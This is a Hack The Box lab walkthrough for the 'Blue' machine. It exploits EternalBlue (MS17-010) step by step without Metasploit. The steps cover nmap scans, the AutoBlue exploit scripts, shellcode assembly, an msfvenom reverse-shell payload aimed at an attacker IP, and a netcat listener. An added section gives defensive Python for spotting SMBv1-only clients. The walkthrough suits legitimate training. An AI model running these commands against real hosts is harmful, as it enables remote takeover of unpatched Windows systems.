# Hack The Box - Blue Walkthrough without Metasploit

![Blue](/files/-MPKRepo9OwTxKOqeqgn)

## Enumeration

To enumerate the box we will use the following nmap command:

```
nmap -sC -sV -A 10.10.10.40
```

![Blue Enumeration](/files/-MPKW4sYvaLzqsfcVOMH)

As we can see, port 445 (SMB) is open, and it even discloses some important information: **Windows 7 Professional 7601 Service Pack 1**. Let's run a new enumeration, this time with vulnerability scripts:

We will be using two flags:

`--script vuln`: applies the "vuln" (vulnerability) category of NSE scripts to the given ports of the box.

`-p 445`: scans only the ports listed, in our case 445, since it's the only one we are currently interested in.

```
nmap --script vuln -p445 10.10.10.40
```

![EternalBlue Vulnerability](/files/-MPKZCmI9G1qPUvdDcUf)

Something really interesting catches our eye, **CVE-2017-0143 (MS17-010)**; with a quick Google search...

### Finding the Vulnerability

{% embed url="<https://www.cvedetails.com/cve/CVE-2017-0143/>" %}

It is the EternalBlue exploit, with lots of Metasploit modules available, but we will not fall into the temptation of using MSF (a really useful tool, but not our goal here).
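On the defensive side of this finding, here is an added example (not part of the original walkthrough or the AutoBlue project) that classifies a captured TCP/445 client payload by the SMB dialect it negotiates: EternalBlue needs SMBv1, so clients that negotiate SMBv1 without offering an SMB2 dialect are the ones to alert on. It assumes NetBIOS session framing in front of the SMB header, and the sample requests are constructed by `build_negotiate()` rather than captured.

```python
# Added example (not from the walkthrough or AutoBlue): classify captured TCP/445
# client payloads by SMB dialect negotiation; SMBv1-only clients are the MS17-010 exposure.
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72

def parse_smb1_negotiate(payload: bytes):
    """Dialect strings from an SMBv1 NEGOTIATE request, or None if it is not one.
    Assumes NetBIOS session framing (1 type byte + 3-byte length) before the header."""
    if len(payload) < 4 + 32 + 3:
        return None
    body_len = int.from_bytes(payload[1:4], "big")
    smb = payload[4:4 + body_len]
    if len(smb) < 35 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        return None
    params_end = 33 + 2 * smb[32]          # WordCount at offset 32, 2 bytes per word
    if params_end + 2 > len(smb):
        return None
    (byte_count,) = struct.unpack_from("<H", smb, params_end)
    data = smb[params_end + 2:params_end + 2 + byte_count]
    dialects, pos = [], 0
    # Each dialect: 0x02 buffer-format byte, then a NUL-terminated ASCII string.
    while pos < len(data) and data[pos] == 0x02:
        end = data.find(b"\x00", pos + 1)
        if end == -1:
            break
        dialects.append(data[pos + 1:end].decode("ascii", "replace"))
        pos = end + 1
    return dialects

def classify(payload: bytes) -> str:
    """'smb2' for an SMB2 header; 'smb1-with-smb2' if the SMBv1 request also offers an
    'SMB 2.*' dialect (client can upgrade); 'smb1-only' if not (alert); else 'other'."""
    if payload[4:8] == SMB2_MAGIC:
        return "smb2"
    dialects = parse_smb1_negotiate(payload)
    if dialects is None:
        return "other"
    if any(d.startswith("SMB 2.") for d in dialects):
        return "smb1-with-smb2"
    return "smb1-only"

def build_negotiate(dialects):
    """Constructed sample input: a NetBIOS-framed SMBv1 NEGOTIATE request."""
    data = b"".join(b"\x02" + d.encode() + b"\x00" for d in dialects)
    header = SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 27   # 32-byte header
    body = header + b"\x00" + struct.pack("<H", len(data)) + data      # WordCount = 0
    return b"\x00" + len(body).to_bytes(3, "big") + body
```

Feeding it the first client-to-server payload of each TCP/445 session from a capture gives a per-host inventory of who still speaks SMBv1, which is the population MS17-010 patching and SMBv1 removal should start with.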

### Non Metasploit exploit

If we search "*a bit more*" we will find this excellent GitHub repository:

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

Let's clone this repository:

```
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
```

There are several scripts in the folder; the first one we will use is `eternal_checker.py`, to confirm the target is vulnerable:

```
python eternal_checker.py 10.10.10.40 -port 445
```

![Eternal Checker](/files/-MPKcuE9nK4pLa-pR-am)

## Exploitation

### Generate a Payload

Now we navigate to the `shellcode` folder in order to generate our payload. This will be done in two steps, the first being the kernel shellcode:

```
nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin
```

![Generating Kernel.bin](/files/-MPKenawfkpB6XZE6zuE)

And now our msfvenom payload:

```
msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f raw -o evilReverse.bin
```

![msfvenom payload](/files/-MPKfRZxy8_CaNkmNBBe)

Now we have to mix them together:

```
cat evilKernel.bin evilReverse.bin > evilPayload.bin
```

![Mixing both parts](/files/-MPKfouwrTGr6RGTCYV1)

### Executing the Exploit

First of all we need a netcat listener:

```
nc -nvlp 443
```

Now we need to decide which Python script to use; from our previous enumeration we know that the target OS is Windows 7.

![Eternalblue\_exploit7.py](/files/-MPKihKE-4tyCNdJ_gl0)

Now, in order to use the exploit, we need some parameters: the **victim IP**, the **mixed payload**, and the **numGroomConn**:

![Failing attempt](/files/-MPKkTBY3DP9v804bI8Z)

This attempt failed, so now we have to change the number of groom connections until we find a value that works; we can keep increasing it until it does.

## Pwnd

After some tries increasing the number of groom connections, we were able to get a shell as NT Authority.

![After some tries](/files/-MPKkxpytR-8F5ss9ZXN)


